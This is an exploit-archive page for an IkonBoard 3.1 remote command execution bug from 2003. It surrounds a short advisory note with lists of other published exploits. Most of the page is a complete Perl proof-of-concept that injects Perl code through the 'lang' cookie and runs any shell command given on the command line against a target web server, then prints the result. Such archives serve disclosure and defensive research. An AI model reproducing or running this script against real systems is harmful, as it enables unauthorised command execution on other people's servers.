Menu

Search for hundreds of thousands of exploits

"IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (2)"

Author

Exploit author

snooq

Platform

Exploit platform

cgi

Release date

Exploit published date

2003-05-05

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
source: https://www.securityfocus.com/bid/7361/info
 
It has been reported that IkonBoard is prone to an arbitrary command execution vulnerability. The vulnerability is due to insufficient sanitization performed on user supplied cookie data.
 
An attacker may exploit this issue to execute arbitrary commands in the security context of the web server hosting the vulnerable IkonBoard. 

#!/usr/bin/perl
#
#  Date: 5 May 2003
#  Author: snooq [http://www.angelfire.com/linux/snooq/]
#
#  Ikonboard 3.1.1 Remote Command Execution PoC
#  ============================================
#  This bug was found by Nick Cleaton.
#
#  For more info and patch, go to:
#  http://archives.neohapsis.com/archives/bugtraq/2003-04/0027.html
#
#  Use at your very own risk.
#
#  Greetz.. my team mates: JF, Nam, ET..
#  And some new frens: Kader, Bufferoulis, Neil... ;)
#
use Socket;
use FileHandle;

if ($ARGV[0] eq '') {
	print "Usage: $0 <host> [cmd] [path]\n";
	exit;
}

my $port=80;
my $host=$ARGV[0];
my $addr=getaddr($ARGV[0]);
my $cmd=$ARGV[1]?($ARGV[1]):"/bin/uname -a";
my $path=$ARGV[2]?($ARGV[2]):"/cgi-bin/ikonboard.cgi";
my $buff=URLEncode(".\0\" unless(1);"
		   ."print \"Content-type: text/plain\\r\\n\\r\\n\";"
		   ."print \"---BEGIN---\\n\".`$cmd`.\"\\n---END---\";exit;#");

socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n";

SOCKET->autoflush();

print SOCKET "GET $path HTTP/1.1\r\n";
print SOCKET "Host: $host\r\n";
print SOCKET "Cookie: lang=$buff\r\n";
print SOCKET "Connection: close\r\n\r\n";
print "Ikonboard Exploit, by snooq [ jinyean\@hotmail.com ]\n\n";

while (<SOCKET>) {
	if (/^---BEGIN---/) {
		print "> $cmd\n";
		while (<SOCKET>){
			if (/^---END---/) { exit; }
			print; 
		} 
	}
}

print "$host seems not vulnerable.\n";

exit;

sub getaddr {
	my $host=($_[0]);
	my $n=$host;
	$n=~tr/\.//d;

	if ($n=~m/\d+/) {
		return pack('C4',split('\.',$host));
	}
	else {
		return (gethostbyname($host))[4];
	}
}

# URLEncode routine, courtesy of Glenn Fleishman 

sub URLEncode {
	my $theURL=$_[0];
	$theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg;
	return $theURL;
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-19 "Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection" webapps cgi "Gabriele Zuddas"
2020-10-29 "Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)" webapps cgi "Valerio Alessandroni"
2020-04-23 "Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)" webapps cgi "Dhiraj Mishra"
2020-04-10 "Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal" webapps cgi "Basim Alabdullah"
2020-03-30 "Zen Load Balancer 3.10.1 - Remote Code Execution" webapps cgi "Cody Sixteen"
2020-02-11 "CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting" webapps cgi Luca.Chiou
2019-09-09 "Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure" webapps cgi LiquidWorm
2019-07-12 "Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution" webapps cgi "Chris Lyne"
2019-02-18 "Master IP CAM 01 3.3.4.2103 - Remote Command Execution" webapps cgi "Raffaele Sabato"
2019-02-11 "IPFire 2.21 - Cross-Site Scripting" webapps cgi "Ozer Goker"
Release Date Title Type Platform Author
2005-07-21 "Microsoft Windows - Color Management Module Overflow (MS05-036) (1)" dos windows snooq
2004-04-15 "WinZip - MIME Parsing Overflow" local windows snooq
2003-11-14 "Microsoft Windows - Workstation Service WKSSVC Remote (MS03-049)" remote windows snooq
2003-11-04 "GNU CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (2)" remote linux snooq
2003-07-04 "ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (2)" local linux snooq
2003-05-05 "IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (2)" webapps cgi snooq
2003-03-26 "GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow" remote windows snooq
2003-01-14 "Geeklog 1.3.7 - 'profiles.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php snooq
2003-01-14 "Geeklog 1.3.7 - 'users.php?uid' Cross-Site Scripting" webapps php snooq
2003-01-14 "Geeklog 1.3.7 - 'Homepage User' HTML Injection" webapps php snooq
2003-01-14 "Geeklog 1.3.7 - 'comment.php?cid' Cross-Site Scripting" webapps php snooq
2003-01-09 "Solaris 2.x/7.0/8 - Derived 'login' Remote Buffer Overflow" remote solaris snooq 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected